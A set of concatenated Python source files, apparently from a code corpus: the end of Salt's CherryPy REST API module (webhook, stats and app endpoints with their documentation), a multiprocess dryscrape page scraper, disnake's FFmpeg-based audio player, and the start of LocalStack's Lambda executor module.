For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
# Late import
try:
from cherrypy.lib import cpstats
except ImportError:
logger.error('Import of cherrypy.cpstats failed. Possible '
'upstream bug here: https://github.com/cherrypy/cherrypy/issues/1444')
return {}
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
jspagescraper.py
|
from multiprocessing import Process, Manager, cpu_count
import webkit_server
import dryscrape
from sa.database import Database
from sa.logger import LOGGER
def get_html(urlQ, callback, xpath_hooks):
"""
This page takes a url from the URL Queue (urlQ) and
calls a callbac that will handle the page source.
xpage_hooks is a list used to determine when the page is loaded,
see the docs for more details (e.g. ["//div[@data-test='whatever']"] ).
"""
svr = webkit_server.Server()
svrconn = webkit_server.ServerConnection(server=svr)
driver = dryscrape.driver.webkit.Driver(connection=svrconn)
sess = dryscrape.Session(driver=driver)
sess.set_header("User-Agent", "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36")
sess.set_attribute("auto_load_images", False)
valid_page_func = lambda: any(sess.at_xpath(xpath) for xpath in xpath_hooks)
db = Database()
while not urlQ.empty():
url = urlQ.get()
sess.visit(url)
try:
sess.wait_for(valid_page_func, interval=1, timeout=15)
except dryscrape.mixins.WaitTimeoutError:
LOGGER.error("Timeout so skipping", url)
continue
response = sess.body()
callback(db, url, response)
sess.reset()
svr.kill()
db.destroy()
class JSPageScraper():
def __init__(self, callback, xpath_hooks, table_name, nproc = None):
self.callback = callback
self.xpath_hooks = xpath_hooks
self.table_name = table_name
self.nproc = cpu_count() - 1 if nproc is None else nproc
def go(self, urls):
LOGGER.info("Preparing threads...")
manager = Manager()
urlQ = manager.Queue()
for url in urls:
urlQ.put(url)
procs = [Process(target=get_html, args=(urlQ, self.callback, self.xpath_hooks), daemon=True) for i in range(self.nproc)]
LOGGER.info("Threads started. Fetching n' parsing!")
for proc in procs:
proc.start()
for proc in procs:
proc.join()
if __name__ == "__main__":
def dic_parse(db, url, html):
LOGGER.notice("Got url", url, "and html with length", len(html))
xpath_hooks = ["//div[@data-test='qsp-statistics']", "//div[@data-test='unknown-quote']"]
jsps = JSPageScraper(dic_parse, xpath_hooks, "key_statistics")
urls = ["https://ca.finance.yahoo.com/quote/IMO.TO/key-statistics"]
jsps.go(urls)
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2015-2021 Rapptz
Copyright (c) 2021-present Disnake Development
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from . import utils
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
if TYPE_CHECKING:
from .voice_client import VoiceClient
MISSING = utils.MISSING
AT = TypeVar("AT", bound="AudioSource")
FT = TypeVar("FT", bound="FFmpegOpusAudio")
_log = logging.getLogger(__name__)
__all__ = (
"AudioSource",
"PCMAudio",
"FFmpegAudio",
"FFmpegPCMAudio",
"FFmpegOpusAudio",
"PCMVolumeTransformer",
)
CREATE_NO_WINDOW: int
if sys.platform != "win32":
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
args: Any,
**subprocess_kwargs: Any,
):
piping = subprocess_kwargs.get("stdin") == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError(
"parameter conflict: 'source' parameter cannot be a string when piping to stdin"
)
args = [executable, *args]
kwargs = {"stdout": subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[Bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f"popen-stdin-writer:{id(self):#x}"
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(
target=self._pipe_writer, args=(source,), daemon=True, name=n
)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(" ")[0] if isinstance(args, str) else args[0]
raise ClientException(executable + " was not found.") from None
except subprocess.SubprocessError as exc:
raise ClientException(f"Popen failed: {exc.__class__.__name__}: {exc}") from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info("Preparing to terminate ffmpeg process %s.", proc.pid)
try:
proc.kill()
except Exception:
_log.exception("Ignoring error attempting to kill ffmpeg process %s", proc.pid)
if proc.poll() is None:
_log.info("ffmpeg process %s has not terminated. Waiting to terminate...", proc.pid)
proc.communicate()
_log.info(
"ffmpeg process %s should have terminated with a return code of %s.",
proc.pid,
proc.returncode,
)
else:
_log.info(
"ffmpeg process %s successfully terminated with return code of %s.",
proc.pid,
proc.returncode,
)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug(
"Write error for %s, this is probably not a problem", self, exc_info=True
)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def check_streams(self) -> None:
if self._process is MISSING or self._stdout is MISSING or self._stdin is MISSING:
raise ValueError("FFmpegAudio cannot be read more than once")
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
args.extend(("-f", "s16le", "-ar", "48000", "-ac", "2", "-loglevel", "warning"))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
# self.check_streams()
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = "ffmpeg",
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
codec = "copy" if codec in ("opus", "libopus") else "libopus"
args.extend(
(
"-map_metadata",
"-1",
"-f",
"opus",
"-c:a",
codec,
"-ar",
"48000",
"-ac",
"2",
"-b:a",
f"{bitrate}k",
"-loglevel",
"warning",
)
)
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[
Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]
] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get("executable")
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[
Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]
] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or "native"
executable = executable or "ffmpeg"
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, "_probe_codec_" + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError(
"Expected str or callable for parameter 'probe', "
f"not '{method.__class__.__name__}'"
)
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(
source, executable: str = "ffmpeg"
) -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + "probe" if executable in ("ffmpeg", "avconv") else executable
args = [
exe,
"-v",
"quiet",
"-print_format",
"json",
"-show_streams",
"-select_streams",
"a:0",
source,
]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = utils._from_json(output)
streamdata = data["streams"][0]
codec = streamdata.get("codec_name")
bitrate = int(streamdata.get("bit_rate", 0))
bitrate = max(round(bitrate / 1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(
source, executable: str = "ffmpeg"
) -> Tuple[Optional[str], Optional[int]]:
args = [executable, "-hide_banner", "-i", source]
proc = subprocess.Popen(
args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
out, _ = proc.communicate(timeout=20)
output = out.decode("utf8")
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b"")
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f"expected AudioSource not {original.__class__.__name__}.")
if original.is_opus():
raise ClientException("AudioSource must not be Opus encoded.")
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception("Calling the after function failed.")
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f"Exception in voice thread {self.name}"
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
lambda_executors.py
|
import os
import re
import json
import time
import logging
import threading
import subprocess
# from datetime import datetime
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
# for Python 2.7
from pipes import quote as cmd_quote
from localstack import config
from localstack.utils.common import run, TMP_FILES, short_uid, save_file, to_str, cp_r
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_RUNTIME_PYTHON27 = 'python2.7'
LAMBDA_RUNTIME_PYTHON36 = 'python3.6'
LAMBDA_RUNTIME_NODEJS = 'nodejs'
LAMBDA_RUNTIME_NODEJS610 = 'nodejs6.10'
LAMBDA_RUNTIME_NODEJS810 = 'nodejs8.10'
LAMBDA_RUNTIME_JAVA8 = 'java8'
LAMBDA_RUNTIME_DOTNETCORE2 = 'dotnetcore2.0'
LAMBDA_RUNTIME_GOLANG = 'go1.x'
LAMBDA_EVENT_FILE = 'event_file.json'
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME = 600
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the execute method """
def __init__(self):
pass
def execute(self, func_arn, func_details, event, context=None, version=None, asynchronous=False):
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
